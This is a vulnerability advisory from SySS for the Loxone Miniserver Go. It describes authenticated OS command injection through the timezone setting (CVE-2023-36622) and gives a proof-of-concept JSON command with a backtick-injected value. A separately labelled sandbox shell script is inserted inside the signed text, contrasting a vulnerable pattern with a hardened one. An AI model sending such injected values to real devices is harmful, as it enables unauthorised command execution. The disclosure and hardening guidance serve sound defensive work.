-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2023-012
Product: Miniserver Go Gen.2
Manufacturer: Loxone
Affected Version(s): <14.0.3.28
Tested Version(s): 14.0.3.28, 13.1.11.17
Vulnerability Type: Improper Neutralization of Special Elements used in an
                    OS Command ('OS Command Injection') (CWE-78)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2023-04-21
Solution Date: 2023-05-09
Public Disclosure: 2023-06-30
CVE Reference: CVE-2023-36622
Author of Advisory: Tobias Jäger, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Loxone Miniserver Go is a smart home hub. The manufacturer describes
the product as follows (see [1]):

"The Loxone Miniserver Go serves as central control unit for all kinds of
automation tasks."

Due to missing validation of user input, it is vulnerable to authenticated
OS command injection.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Loxone Miniserver Go does not validate user input when the timezone of
the device is set. Because the timezone is applied in a Linux shell context
that creates a symlink, a user can break out of the intended command and
execute arbitrary OS commands. Command execution in this shell context can
be achieved with backticks (`). The timezone can only be modified when
authenticated as an administrative user.

To communicate with the Loxone Miniserver Go, a WebSocket connection needs
to be established and cryptographic parameters need to be negotiated. This
is described in "Communicating with the Loxone Miniserver" (see [4]).
Commands sent over the authenticated WebSocket need to be encrypted in the
way described in that paper.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Follow the instructions in "Communicating with the Loxone Miniserver"
(see [4]) to establish a WebSocket connection and authenticate as an
administrative user.
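The following shell script is an added illustration; it is not part of this advisory and not Loxone firmware code. It models, in a temporary sandbox directory, the pattern the advisory describes (a user-supplied timezone name interpolated into a shell command that creates a symlink), shows that a backtick payload of the same shape as the one below runs the injected command while still yielding the valid zone name Europe/Vienna, and contrasts it with a variant that validates the name and never hands it to a shell. The sandbox layout, the exact ln invocation and the set_timezone_* function names are assumptions; the device's real implementation is not known from the advisory.

```shell
#!/bin/sh
# Added illustration (not Loxone code): why a timezone string spliced into a
# shell command is OS command injection (CWE-78), and one way to validate it.
# Everything happens in a constructed sandbox; the device's real paths and
# the exact command it runs are assumptions.

SANDBOX="${SANDBOX:-$(mktemp -d)}"
ZONEINFO="$SANDBOX/zoneinfo"
LOCALTIME="$SANDBOX/localtime"
mkdir -p "$ZONEINFO/Europe"
: > "$ZONEINFO/Europe/Vienna"        # stand-in for a tzdata file

# Vulnerable pattern (assumed): the user-controlled name is interpolated into
# a command string that a second shell then parses, so backticks in the value
# are expanded as command substitution.
set_timezone_vulnerable() {
    sh -c "ln -sf \"$ZONEINFO/$1\" \"$LOCALTIME\""
}

# Hardened pattern: allow only Area/Location names built from [A-Za-z0-9_+-],
# reject empty names, absolute paths, trailing slashes and "..", require the
# target file to exist, and call ln directly so the value is only ever an
# argument and never shell syntax.
set_timezone_hardened() {
    case "$1" in
        ""|/*|*/|*..*|*[!A-Za-z0-9_+/-]*) return 1 ;;
    esac
    [ -f "$ZONEINFO/$1" ] || return 1
    ln -sf "$ZONEINFO/$1" "$LOCALTIME"
}

# Constructed payload with the same shape as the advisory's: the injected
# command runs, and the trailing "echo Vienna" turns the substituted value
# back into Europe/Vienna so the symlink still points at a real zone file.
PAYLOAD="Europe/\`touch $SANDBOX/hacked;echo Vienna\`"

# Returns 0 when the vulnerable variant ran the injected command (marker file
# created, symlink still valid) and the hardened variant rejected the same
# input without touching anything, then accepted a legitimate name.
run_demo() {
    rm -f "$SANDBOX/hacked"
    set_timezone_vulnerable "$PAYLOAD"
    [ -f "$SANDBOX/hacked" ] || return 1
    [ "$(readlink "$LOCALTIME")" = "$ZONEINFO/Europe/Vienna" ] || return 1
    rm -f "$SANDBOX/hacked" "$LOCALTIME"
    if set_timezone_hardened "$PAYLOAD"; then return 1; fi
    [ ! -f "$SANDBOX/hacked" ] || return 1
    set_timezone_hardened "Europe/Vienna" || return 1
    [ "$(readlink "$LOCALTIME")" = "$ZONEINFO/Europe/Vienna" ] || return 1
}

if run_demo; then
    echo "injection reproduced in sandbox; hardened variant rejected it"
else
    echo "demo did not behave as expected"
fi
```

Run it with sh; it only touches the directory created by mktemp. The point the two functions make is the general one behind CWE-78: quoting inside a string that is later re-parsed by a shell does not help (the backticks here sit inside double quotes and are still expanded), whereas an allowlist on the characters plus an existence check under the zoneinfo directory, with ln invoked directly, leaves no shell to interpret metacharacters.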
Setting the timezone to "Europe/`touch /lx/hacked;echo Vienna`" executes
the injected OS command, which creates an empty file named "hacked" in the
folder /lx; the trailing "echo Vienna" leaves Europe/Vienna as the
resulting zone name. Setting the timezone can be achieved by encrypting
and sending the following command to the WebSocket:

jdev/sys/setconfiguration/?json={"ip":0,"mask":16777215,"gateway":23505088,
"dns1":23505088,"dns2":134744072,"mtu":0,"port-http":80,"port-ftp":21,
"port-monitor":7777,"confLocalOnly":false,"msName":"SySS","host":"hostname",
"ntp":"","timezone":"Europe/`touch /lx/hacked;echo Vienna`","externHost":"",
"port-extHttp":0,"port-extHttps":0,"useProxy":false}

If the attack was successful, an empty file named "hacked" can be found in
the folder reachable via FTP.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install firmware version 14.1.5.9.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2023-04-20: Vulnerability discovered
2023-04-21: Vulnerability reported to manufacturer
2023-05-09: Patch released by manufacturer
2023-06-30: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for the Loxone Miniserver Go
    https://www.loxone.com/dede/kb/miniserver-go/
[2] SySS Security Advisory SYSS-2023-012
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-012.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] Communicating with the Loxone Miniserver
    https://www.loxone.com/dede/wp-content/uploads/sites/2/2022/06/1300_Communicating-with-the-Miniserver.pdf

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Tobias Jäger of SySS GmbH.
E-Mail: tobias.jaeger@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Tobias_Jaeger.asc
Key ID: 0xABF0CF2F4D0220F9
Key Fingerprint: 5C9F 5312 F37E B9AB E87B 1212 ABF0 CF2F 4D02 20F9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEXJ9TEvN+uavoexISq/DPL00CIPkFAmSdKcIACgkQq/DPL00C
IPlgIRAAmVs9+YOlJI/Zayq0N0L02MahU1DBXNEDRWUDTCyfF4egLxREPJOokxyf
KbhRFTqBIhtHah1yWbY6o3A5n38fLZ0nHvdly1N3ZmTQVHTqhZtPvYTlKNVj6xQn
nlWd/Z4K3aauNo4hV+sodYEwyf/T6WIn2N7/wpfLh1GjvWMPoo2ANIWaeHwjWVZD
5nzgLdrCRROCATsgwzIPLDP0DOXcFC/4Yccz8rGKCtJTVdGjEyXu8d+IrCIBStsI
j/KMAmKsDfOagie5HCZWckZZ1KlEjusPUFZa2ZHe51OX4Joqhb9RLntWdTYLwn0O
cMpzqPRoa2N2eLWcJyYLzGquhsew1n0iRHCzH9Hu/Q4aU7YxNhsb6oOVZEA1Pmg9
Og1EJEwjO80qq7A8FrxlKfC+ZEvNy9C66TZIQbhhZ+CDFTWMdJRAPFJJ0kDUaf7z
u26WnwtbDTNroMIlSoNqpQKkRbavPcqrtRqRYCkHmunS5DsfeEQhQkpy5aNsDnYy
TsXPCitoBtNBlIwUjTYHokxMZ9hkPqMyyuIylMZpB11SKsqpENtfLqJRPhKUVBdi
mrKvqntconlVRwV9BZanrkxkySvhrl7s5kWVukmc5TLr7T5Rn/MuQx7ShZxU6iFn
07vhXTkPUE6os4DCWsXtgR5dAwG5T8asiqtSb+R+3Axj6nRLD0Q=
=hxVd
-----END PGP SIGNATURE-----